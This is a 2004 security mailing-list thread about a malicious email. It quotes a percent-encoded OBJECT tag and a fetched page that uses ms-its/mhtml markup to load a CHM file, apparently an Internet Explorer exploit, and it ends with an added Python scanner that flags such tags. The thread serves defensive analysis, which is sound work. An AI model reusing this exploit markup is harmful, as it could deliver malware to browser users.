
| Subject: | Re: Virus from vikord.com? |
|---|---|
| Date: | Fri, 27 Aug 2004 17:28:08 -0400 |

Yes, it tries to exploit a vulnerability, I believe. Sorry for being vague, but not on a PC right now.

Bruce Martins
Systems Administrator
EXTEND>>MEDIA
190 Liberty Street
Toronto, Ontario M6K 3L5
_________________________
e : bmartins@extend.com
t : (416) 535-4222, ext 2307
f : (416) 535-1201
http://www.extend.com

--------------------------
Sent from my BlackBerry Wireless Handheld

-----Original Message-----
From: Mason, Samuel <smason@state.mt.us>
To: focus-virus@securityfocus.com <focus-virus@securityfocus.com>
Sent: Fri Aug 27 14:05:08 2004
Subject: Virus from vikord.com?

Hello all,

I'd like to see who else has run into this problem. We had a user receive a mail from what was supposed to be another State employee. The email had a GIF attachment (2.gif) with the subject line of "2". The GIF file was invalid and only contained the characters "45451212". The HTML in the message included this:

```
<OBJECT data=http://www.v%69k%6F%72d.com/default.htm>
```

which resolved to www.vikord.com.default.htm. The site is down with a "Service Temporarily Unavailable" message due to maintenance or capacity problems.

I Googled for an answer and got a little info that included this:

Quick snag with wget:

```
wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50--  http://www.vikord.com/default.htm
           => `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=> ] 350           --.--K/s

14:26:56 (3.34 MB/s) - `default.htm' saved [350]

username@coroner ~ $ cat default.htm
<textarea id="code" style="display:none;">
<object data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('default.htm'))));
</script>
```

Which seems to indicate the original intent was to download a CHM file, correct?

I'd like to know if someone else has seen this. Is this a known virus or something that I just could not find info for? The website is down, which is good, but how can we mitigate this on a more permanent basis? Our workstations indicated that the ActiveX control could not run and the page would not display properly, but I am concerned that users may have lower security settings somewhere in the enterprise.

Thanks for any help.

Samuel Mason, CISSP OCP,
Information Technology Services Division
State of Montana
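
Both OBJECT tags quoted in the message above hide part of their URL behind percent-encoding of plain letters, which a mail or proxy filter can test for. The Python sketch below is an added example, not part of the original thread; the function name, reason labels and marker list are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# <object ... data=VALUE> with a quoted or unquoted value, found anywhere in the
# text (including inside a <textarea>, where the quoted page kept its markup).
OBJECT_DATA = re.compile(r"""<object\b[^>]*?\bdata\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)
# %XX escapes that decode to plain ASCII letters or digits; these never need encoding.
ENCODED_ALNUM = re.compile(r"%(?:3[0-9]|[46][1-9a-f]|[57][0-9a])", re.I)
# Handler markers seen in the sample from this thread (checked after decoding).
RISKY_MARKERS = ("ms-its:", "mhtml:", ".chm::")


def scan_object_data(html):
    """Return [(raw_url, decoded_url, reasons)] for suspicious <object data=...> values."""
    findings = []
    for match in OBJECT_DATA.finditer(html):
        raw = match.group(1).strip("\"'")
        decoded = unquote(raw)
        reasons = []
        try:
            host = urlsplit(raw).netloc
        except ValueError:  # malformed authority, e.g. unbalanced IPv6 brackets
            host = ""
        if ENCODED_ALNUM.search(host):
            reasons.append("encoded-host")
        markers = [m for m in RISKY_MARKERS if m in decoded.lower()]
        if markers:
            reasons.append("its-or-mhtml-handler")
        if any(m not in raw.lower() for m in markers):
            reasons.append("handler-hidden-by-encoding")
        if reasons:
            findings.append((raw, decoded, reasons))
    return findings


# Inputs: the two OBJECT tags quoted in the message above, plus a constructed benign tag.
SAMPLE_MAIL = "<OBJECT data=http://www.v%69k%6F%72d.com/default.htm>"
SAMPLE_PAGE = r'''<textarea id="code" style="display:none;">
<object data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object>
</textarea>'''
BENIGN = '<object data="https://example.org/report%20final.pdf" type="application/pdf"></object>'

if __name__ == "__main__":
    for sample in (SAMPLE_MAIL, SAMPLE_PAGE, BENIGN):
        for raw, decoded, reasons in scan_object_data(sample):
            print(f"{', '.join(reasons)}: {raw} -> {decoded}")
```

The benign tag is not reported because `%20` in a path is ordinary encoding; only escapes that decode to letters or digits in the host, or that conceal a handler name, are flagged.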